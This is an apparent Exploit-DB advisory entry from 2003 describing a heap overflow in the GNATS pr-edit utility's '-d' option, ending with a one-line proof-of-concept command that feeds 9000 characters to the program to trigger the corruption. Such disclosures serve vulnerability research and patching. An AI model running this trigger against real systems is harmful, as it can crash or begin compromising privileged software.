GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption

EDB-ID:

22814

CVE:


Type:

dos

Platform:

Linux

Published:

2003-06-21

source: http://www.securityfocus.com/bid/8003/info

A heap overflow vulnerability has been reported for the pr-edit utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option.

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges. 

/usr/local/lib/gnats/./pr-edit -d`perl -e 'print "x"x9000'`